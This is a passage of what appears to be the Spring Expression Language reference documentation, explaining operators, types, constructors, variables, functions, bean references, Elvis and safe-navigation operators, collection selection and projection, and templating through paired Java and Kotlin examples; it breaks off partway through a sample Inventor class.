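\nFor example, the following sketch uses the alphabetic operators in place of their symbolic forms (reusing the `parser` from the earlier examples):\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t\/\/ evaluates to true (equivalent to \"2 > 1\")\n\tboolean trueValue = parser.parseExpression(\"2 gt 1\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false (equivalent to \"'abc' != 'abc'\")\n\tboolean falseValue = parser.parseExpression(\"'abc' ne 'abc'\").getValue(Boolean.class);\n----\n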
\n\n[[expressions-operators-logical]]\n==== Logical Operators\n\nSpEL supports the following logical operators:\n\n* `and` (`&&`)\n* `or` (`||`)\n* `not` (`!`)\n\nThe following example shows how to use the logical operators:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"true and false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"true or false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"!true\").getValue(Boolean.class);\n\n\t\/\/ -- AND and NOT --\n\tString expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\";\n\tboolean falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"true and false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"true or false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"!true\").getValue(Boolean::class.java)\n\n\t\/\/ -- AND and NOT --\n\tval expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\"\n\tval falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators-mathematical]]\n==== Mathematical Operators\n\nYou can use the addition operator on both numbers and strings. You can use the subtraction, multiplication,\nand division operators only on numbers. You can also use\nthe modulus (`%`) and exponential power (`^`) operators. Standard operator precedence is enforced.\nThe following example shows the mathematical operators in use:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Addition\n\tint two = parser.parseExpression(\"1 + 1\").getValue(Integer.class); \/\/ 2\n\n\tString testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String.class); \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tint four = parser.parseExpression(\"1 - -3\").getValue(Integer.class); \/\/ 4\n\n\tdouble d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double.class); \/\/ -9000\n\n\t\/\/ Multiplication\n\tint six = parser.parseExpression(\"-2 * -3\").getValue(Integer.class); \/\/ 6\n\n\tdouble twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double.class); \/\/ 24.0\n\n\t\/\/ Division\n\tint minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Integer.class); \/\/ -2\n\n\tdouble one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double.class); \/\/ 1.0\n\n\t\/\/ Modulus\n\tint three = parser.parseExpression(\"7 % 4\").getValue(Integer.class); \/\/ 3\n\n\tint one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Integer.class); \/\/ 1\n\n\t\/\/ Operator precedence\n\tint minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Integer.class); \/\/ -21\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Addition\n\tval two = parser.parseExpression(\"1 + 1\").getValue(Int::class.java) \/\/ 2\n\n\tval testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String::class.java) \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tval four = parser.parseExpression(\"1 - -3\").getValue(Int::class.java) \/\/ 4\n\n\tval d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double::class.java) \/\/ -9000\n\n\t\/\/ Multiplication\n\tval six = parser.parseExpression(\"-2 * -3\").getValue(Int::class.java) \/\/ 6\n\n\tval twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double::class.java) \/\/ 24.0\n\n\t\/\/ Division\n\tval minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Int::class.java) \/\/ -2\n\n\tval one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double::class.java) \/\/ 1.0\n\n\t\/\/ Modulus\n\tval three = parser.parseExpression(\"7 % 4\").getValue(Int::class.java) \/\/ 3\n\n\tval one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Int::class.java) \/\/ 1\n\n\t\/\/ Operator precedence\n\tval minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Int::class.java) \/\/ -21\n----\n\n\n[[expressions-assignment]]\n==== The Assignment Operator\n\nTo set a property, use the assignment operator (`=`). This is typically\ndone within a call to `setValue` but can also be done inside a call to `getValue`.
\nThe following listing shows both ways to use the assignment operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor inventor = new Inventor();\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\n\tparser.parseExpression(\"name\").setValue(context, inventor, \"Aleksandar Seovic\");\n\n\t\/\/ alternatively\n\tString aleks = parser.parseExpression(\n\t\t\t\"name = 'Aleksandar Seovic'\").getValue(context, inventor, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval inventor = Inventor()\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\n\tparser.parseExpression(\"name\").setValue(context, inventor, \"Aleksandar Seovic\")\n\n\t\/\/ alternatively\n\tval aleks = parser.parseExpression(\n\t\t\t\"name = 'Aleksandar Seovic'\").getValue(context, inventor, String::class.java)\n----\n\n\n[[expressions-types]]\n=== Types\n\nYou can use the special `T` operator to specify an instance of `java.lang.Class` (the\ntype). Static methods are invoked by using this operator as well. The\n`StandardEvaluationContext` uses a `TypeLocator` to find types, and the\n`StandardTypeLocator` (which can be replaced) is built with an understanding of the\n`java.lang` package. This means that `T()` references to types within `java.lang` do not need to be\nfully qualified, but all other type references must be. The following example shows how\nto use the `T` operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tClass dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class.class);\n\n\tClass stringClass = parser.parseExpression(\"T(String)\").getValue(Class.class);\n\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval dateClass = parser.parseExpression(\"T(java.util.Date)\").getValue(Class::class.java)\n\n\tval stringClass = parser.parseExpression(\"T(String)\").getValue(Class::class.java)\n\n\tval trueValue = parser.parseExpression(\n\t\t\t\"T(java.math.RoundingMode).CEILING < T(java.math.RoundingMode).FLOOR\")\n\t\t\t.getValue(Boolean::class.java)\n----\n
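\nBecause static methods can also be invoked through the `T` operator, the following minimal sketch (reusing the `parser` from the earlier examples) calls a static method on `java.lang.Math`:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t\/\/ invokes the static method Math.abs(int); evaluates to 7\n\tint absValue = parser.parseExpression(\"T(java.lang.Math).abs(-7)\").getValue(Integer.class);\n----\n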
\n\n\n[[expressions-constructors]]\n=== Constructors\n\nYou can invoke constructors by using the `new` operator. You should use the fully qualified class name\nfor all but the primitive types (`int`, `float`, and so on) and `String`. The following\nexample shows how to use the `new` operator to invoke constructors:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor.class);\n\n\t\/\/ create a new Inventor instance within the add() method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval einstein = p.parseExpression(\n\t\t\t\"new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German')\")\n\t\t\t.getValue(Inventor::class.java)\n\n\t\/\/ create a new Inventor instance within the add() method of List\n\tp.parseExpression(\n\t\t\t\"Members.add(new org.spring.samples.spel.inventor.Inventor('Albert Einstein', 'German'))\")\n\t\t\t.getValue(societyContext)\n----\n\n\n\n[[expressions-ref-variables]]\n=== Variables\n\nYou can reference variables in the expression by using the `#variableName` syntax. Variables\nare set by using the `setVariable` method on `EvaluationContext` implementations.\n\n[NOTE]\n====\nValid variable names must be composed of one or more of the following supported\ncharacters:\n\n* letters: `A` to `Z` and `a` to `z`\n* digits: `0` to `9`\n* underscore: `_`\n* dollar sign: `$`\n====\n\nThe following example shows how to use variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\tcontext.setVariable(\"newName\", \"Mike Tesla\");\n\n\tparser.parseExpression(\"name = #newName\").getValue(context, tesla);\n\tSystem.out.println(tesla.getName()); \/\/ \"Mike Tesla\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\n\tval context = SimpleEvaluationContext.forReadWriteDataBinding().build()\n\tcontext.setVariable(\"newName\", \"Mike Tesla\")\n\n\tparser.parseExpression(\"name = #newName\").getValue(context, tesla)\n\tprintln(tesla.name) \/\/ \"Mike Tesla\"\n----\n\n\n[[expressions-this-root]]\n==== The `#this` and `#root` Variables\n\nThe `#this` variable is always defined and refers to the current evaluation object\n(against which unqualified references are resolved). The `#root` variable is always\ndefined and refers to the root context object. Although `#this` may vary as components of\nan expression are evaluated, `#root` always refers to the root.
\nThe following examples\nshow how to use the `#this` and `#root` variables:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ create a list of integers\n\tList<Integer> primes = new ArrayList<Integer>();\n\tprimes.addAll(Arrays.asList(2,3,5,7,11,13,17));\n\n\t\/\/ create parser and set variable 'primes' as the list of integers\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"primes\", primes);\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?[...])\n\t\/\/ evaluates to [11, 13, 17]\n\tList<Integer> primesGreaterThanTen = (List<Integer>) parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ create a list of integers\n\tval primes = ArrayList<Int>()\n\tprimes.addAll(listOf(2, 3, 5, 7, 11, 13, 17))\n\n\t\/\/ create parser and set variable 'primes' as the list of integers\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"primes\", primes)\n\n\t\/\/ all prime numbers > 10 from the list (using selection ?[...])\n\t\/\/ evaluates to [11, 13, 17]\n\tval primesGreaterThanTen = parser.parseExpression(\n\t\t\t\"#primes.?[#this>10]\").getValue(context) as List<Int>\n----\n\n\n\n[[expressions-ref-functions]]\n=== Functions\n\nYou can extend SpEL by registering user-defined functions that can be called within the\nexpression string. The function is registered through the `EvaluationContext`. The\nfollowing example shows how to register a user-defined function:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMethod method = ...;\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"myFunction\", method);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval method: Method = ...\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"myFunction\", method)\n----\n\nFor example, consider the following utility method that reverses a string:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic abstract class StringUtils {\n\n\t\tpublic static String reverseString(String input) {\n\t\t\tStringBuilder backwards = new StringBuilder(input.length());\n\t\t\tfor (int i = 0; i < input.length(); i++) {\n\t\t\t\tbackwards.append(input.charAt(input.length() - 1 - i));\n\t\t\t}\n\t\t\treturn backwards.toString();\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tfun reverseString(input: String): String {\n\t\tval backwards = StringBuilder(input.length)\n\t\tfor (i in 0 until input.length) {\n\t\t\tbackwards.append(input[input.length - 1 - i])\n\t\t}\n\t\treturn backwards.toString()\n\t}\n----\n\nYou can then register and use the preceding method, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\tcontext.setVariable(\"reverseString\",\n\t\t\tStringUtils.class.getDeclaredMethod(\"reverseString\", String.class));\n\n\tString helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String.class);\n----\n
[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\tcontext.setVariable(\"reverseString\", ::reverseString.javaMethod)\n\n\tval helloWorldReversed = parser.parseExpression(\n\t\t\t\"#reverseString('hello')\").getValue(context, String::class.java)\n----\n\n\n\n[[expressions-bean-references]]\n=== Bean References\n\nIf the evaluation context has been configured with a bean resolver, you can\nlook up beans from an expression by using the `@` symbol. The following example shows how\nto do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context, \"something\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"@something\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context, \"something\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"@something\").getValue(context)\n----\n\nTo access a factory bean itself, you should instead prefix the bean name with an `&` symbol.\nThe following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tStandardEvaluationContext context = new StandardEvaluationContext();\n\tcontext.setBeanResolver(new MyBeanResolver());\n\n\t\/\/ This will end up calling resolve(context, \"&foo\") on MyBeanResolver during evaluation\n\tObject bean = parser.parseExpression(\"&foo\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = StandardEvaluationContext()\n\tcontext.setBeanResolver(MyBeanResolver())\n\n\t\/\/ This will end up calling resolve(context, \"&foo\") on MyBeanResolver during evaluation\n\tval bean = parser.parseExpression(\"&foo\").getValue(context)\n----\n\n\n[[expressions-operator-ternary]]\n=== Ternary Operator (If-Then-Else)\n\nYou can use the ternary operator for performing if-then-else conditional logic inside\nthe expression. The following listing shows a minimal example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval falseString = parser.parseExpression(\n\t\t\t\"false ? 'trueExp' : 'falseExp'\").getValue(String::class.java)\n----\n\nIn this case, the boolean `false` results in returning the string value `'falseExp'`. A more\nrealistic example follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tparser.parseExpression(\"name\").setValue(societyContext, \"IEEE\");\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\");\n
\n\tString expression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" +\n\t\t\t\"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\";\n\n\tString queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String.class);\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tparser.parseExpression(\"name\").setValue(societyContext, \"IEEE\")\n\tsocietyContext.setVariable(\"queryName\", \"Nikola Tesla\")\n\n\tval expression = \"isMember(#queryName)? #queryName + ' is a member of the ' \" +\n\t\t\t\"+ Name + ' Society' : #queryName + ' is not a member of the ' + Name + ' Society'\"\n\n\tval queryResultString = parser.parseExpression(expression)\n\t\t\t.getValue(societyContext, String::class.java)\n\t\/\/ queryResultString = \"Nikola Tesla is a member of the IEEE Society\"\n----\n\nSee the next section on the Elvis operator for an even shorter syntax for the\nternary operator.\n\n\n\n[[expressions-operator-elvis]]\n=== The Elvis Operator\n\nThe Elvis operator is a shortening of the ternary operator syntax and is used in the\nhttp:\/\/www.groovy-lang.org\/operators.html#_elvis_operator[Groovy] language.\nWith the ternary operator syntax, you usually have to repeat a variable twice, as the\nfollowing example shows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes\"]\n----\n\tString name = \"Elvis Presley\";\n\tString displayName = (name != null ? name : \"Unknown\");\n----\n\nInstead, you can use the Elvis operator (named for the resemblance to Elvis' hair style).\nThe following example shows how to use the Elvis operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tString name = parser.parseExpression(\"name?:'Unknown'\").getValue(new Inventor(), String.class);\n\tSystem.out.println(name); \/\/ 'Unknown'\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\tval name = parser.parseExpression(\"name?:'Unknown'\").getValue(Inventor(), String::class.java)\n\tprintln(name) \/\/ 'Unknown'\n----\n\nThe following listing shows a more complex example:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\tString name = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Nikola Tesla\n\n\ttesla.setName(null);\n\tname = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String.class);\n\tSystem.out.println(name); \/\/ Elvis Presley\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\tvar name = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Nikola Tesla\n\n\ttesla.setName(null)\n\tname = parser.parseExpression(\"name?:'Elvis Presley'\").getValue(context, tesla, String::class.java)\n\tprintln(name) \/\/ Elvis Presley\n----\n\n[NOTE]\n====\nYou can use the Elvis operator to apply default\n
values in expressions. The following\nexample shows how to use the Elvis operator in a `@Value` expression:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t@Value(\"#{systemProperties['pop3.port'] ?: 25}\")\n----\n\nThis will inject the system property `pop3.port` if it is defined or 25 if not.\n====\n\n\n[[expressions-operator-safe-navigation]]\n=== Safe Navigation Operator\n\nThe safe navigation operator is used to avoid a `NullPointerException` and comes from\nthe http:\/\/www.groovy-lang.org\/operators.html#_safe_navigation_operator[Groovy]\nlanguage. Typically, when you have a reference to an object, you might need to verify that\nit is not null before accessing methods or properties of the object. To avoid this, the\nsafe navigation operator returns null instead of throwing an exception. The following\nexample shows how to use the safe navigation operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\tInventor tesla = new Inventor(\"Nikola Tesla\", \"Serbian\");\n\ttesla.setPlaceOfBirth(new PlaceOfBirth(\"Smiljan\"));\n\n\tString city = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null);\n\tcity = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String.class);\n\tSystem.out.println(city); \/\/ null - does not throw NullPointerException\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\tval tesla = Inventor(\"Nikola Tesla\", \"Serbian\")\n\ttesla.setPlaceOfBirth(PlaceOfBirth(\"Smiljan\"))\n\n\tvar city = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ Smiljan\n\n\ttesla.setPlaceOfBirth(null)\n\tcity = parser.parseExpression(\"placeOfBirth?.city\").getValue(context, tesla, String::class.java)\n\tprintln(city) \/\/ null - does not throw NullPointerException\n----\n\n\n\n[[expressions-collection-selection]]\n=== Collection Selection\n\nSelection is a powerful expression language feature that lets you transform a\nsource collection into another collection by selecting from its entries.\n\nSelection uses a syntax of `.?[selectionExpression]`. It filters the collection and\nreturns a new collection that contains a subset of the original elements. For example,\nselection lets us easily get a list of Serbian inventors, as the following example shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tList<Inventor> list = (List<Inventor>) parser.parseExpression(\n\t\t\t\"members.?[nationality == 'Serbian']\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval list = parser.parseExpression(\n\t\t\t\"members.?[nationality == 'Serbian']\").getValue(societyContext) as List<Inventor>\n----\n\nSelection is possible on both lists and maps. For a list, the selection\ncriterion is evaluated against each individual list element. For a map, the\nselection criterion is evaluated against each map entry (objects of the Java type\n`Map.Entry`).
\nEach map entry has its key and value accessible as properties for use in\nthe selection.\n\nThe following expression returns a new map that consists of those elements of the original map\nwhere the entry value is less than 27:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tMap newMap = parser.parseExpression(\"map.?[value<27]\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval newMap = parser.parseExpression(\"map.?[value<27]\").getValue()\n----\n\nIn addition to returning all the selected elements, you can retrieve only the\nfirst or the last matching entry. To obtain the first entry matching the selection, the syntax is\n`.^[selectionExpression]`. To obtain the last matching entry, the syntax is\n`.$[selectionExpression]`.\n
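\nFor example, the following sketch (reusing the `societyContext` and `members` from the earlier selection examples) retrieves the first and the last matching entry:\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\t\/\/ evaluates to the first member whose nationality is Serbian\n\tInventor firstSerbian = (Inventor) parser.parseExpression(\n\t\t\t\"members.^[nationality == 'Serbian']\").getValue(societyContext);\n\n\t\/\/ evaluates to the last member whose nationality is Serbian\n\tInventor lastSerbian = (Inventor) parser.parseExpression(\n\t\t\t\"members.$[nationality == 'Serbian']\").getValue(societyContext);\n----\n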
\n\n\n[[expressions-collection-projection]]\n=== Collection Projection\n\nProjection lets a collection drive the evaluation of a sub-expression, and the\nresult is a new collection. The syntax for projection is `.![projectionExpression]`. For\nexample, suppose we have a list of inventors but want the list of\ncities where they were born. Effectively, we want to evaluate 'placeOfBirth.city' for\nevery entry in the inventor list. The following example uses projection to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ returns ['Smiljan', 'Idvor']\n\tList placesOfBirth = (List) parser.parseExpression(\n\t\t\t\"members.![placeOfBirth.city]\").getValue(societyContext);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ returns ['Smiljan', 'Idvor']\n\tval placesOfBirth = parser.parseExpression(\n\t\t\t\"members.![placeOfBirth.city]\").getValue(societyContext) as List<*>\n----\n\nYou can also use a map to drive projection and, in this case, the projection expression is\nevaluated against each entry in the map (represented as a Java `Map.Entry`). The result\nof a projection across a map is a list that consists of the evaluation of the projection\nexpression against each map entry.\n\n\n\n[[expressions-templating]]\n=== Expression Templating\n\nExpression templates allow mixing literal text with one or more evaluation blocks.\nEach evaluation block is delimited with prefix and suffix characters that you can\ndefine. A common choice is to use `#{ }` as the delimiters, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tString randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tnew TemplateParserContext()).getValue(String.class);\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval randomPhrase = parser.parseExpression(\n\t\t\t\"random number is #{T(java.lang.Math).random()}\",\n\t\t\tTemplateParserContext()).getValue(String::class.java)\n\n\t\/\/ evaluates to \"random number is 0.7038186818312008\"\n----\n\nThe string is evaluated by concatenating the literal text `'random number is '` with the\nresult of evaluating the expression inside the `#{ }` delimiter (in this case, the result\nof calling that `random()` method). The second argument to the `parseExpression()` method\nis of the type `ParserContext`. The `ParserContext` interface is used to influence how\nthe expression is parsed in order to support the expression templating functionality.\nThe definition of `TemplateParserContext` follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class TemplateParserContext implements ParserContext {\n\n\t\tpublic String getExpressionPrefix() {\n\t\t\treturn \"#{\";\n\t\t}\n\n\t\tpublic String getExpressionSuffix() {\n\t\t\treturn \"}\";\n\t\t}\n\n\t\tpublic boolean isTemplate() {\n\t\t\treturn true;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass TemplateParserContext : ParserContext {\n\n\t\toverride fun getExpressionPrefix(): String {\n\t\t\treturn \"#{\"\n\t\t}\n\n\t\toverride fun getExpressionSuffix(): String {\n\t\t\treturn \"}\"\n\t\t}\n\n\t\toverride fun isTemplate(): Boolean {\n\t\t\treturn true\n\t\t}\n\t}\n----\n\n\n[[expressions-example-classes]]\n== Classes Used in the Examples\n\nThis section lists the classes used in the examples throughout this chapter.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Inventor.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.Date;\n\timport java.util.GregorianCalendar;\n\n\tpublic class Inventor {\n\n\t\tprivate String name;\n\t\tprivate String nationality;\n\t\tprivate String[] inventions;\n\t\tprivate Date birthdate;\n\t\tprivate PlaceOfBirth placeOfBirth;\n\n\t\tpublic Inventor(String name, String nationality) {\n\t\t\tGregorianCalendar c = new GregorianCalendar();\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = c.getTime();\n\t\t}\n\n\t\tpublic Inventor(String name, Date birthdate, String nationality) {\n\t\t\tthis.name = name;\n\t\t\tthis.nationality = nationality;\n\t\t\tthis.birthdate = 